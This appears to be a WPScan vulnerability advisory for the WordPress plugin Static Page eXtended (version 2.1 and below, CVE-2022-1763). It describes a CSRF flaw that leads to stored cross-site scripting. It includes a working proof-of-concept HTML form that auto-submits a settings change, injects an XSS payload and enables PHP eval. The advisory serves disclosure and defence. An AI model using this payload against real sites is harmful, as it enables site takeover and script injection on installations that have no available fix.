WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Static Page eXtended <= 2.1 - Arbitrary Settings Update via CSRF to Stored XSS

Description

Due to missing checks the plugin is vulnerable to CSRF attacks which allows changing the plugin settings, including required user levels for specific features. This could also lead to Stored Cross-Site Scripting due to the lack of escaping in some of the settings

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=jp-staticpagex.php&action=modifypluginoptions" method="POST">
    <input type="text" name="JPSPX_MODIFY_PLUGIN_OPTIONS" value="1">
    <input type="text" name="JPSPX_REPLACE_CONTENT_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_REPLACE_CONTENT_FOLDER" value='wp-content/staticpages/"autofocus onfocus=alert`XSS`//'>
    <input type="text" name="JPSPX_REDIRECT_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_INLINE_INCLUDES_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_EVAL_PHP_USER_LEVEL" value="1">
    <input type="text" name="JPSPX_EVAL_PHP" value="on">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

jp-staticpagex
No known fix - plugin closed

References

CVE
CVE-2022-1763

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
bd3aff73-078a-4e5a-b9e3-1604851c6df8

Timeline

Publicly Published

2022-05-23 (about 2 months ago)

Added

2022-05-23 (about 2 months ago)

Last Updated

2022-05-23 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin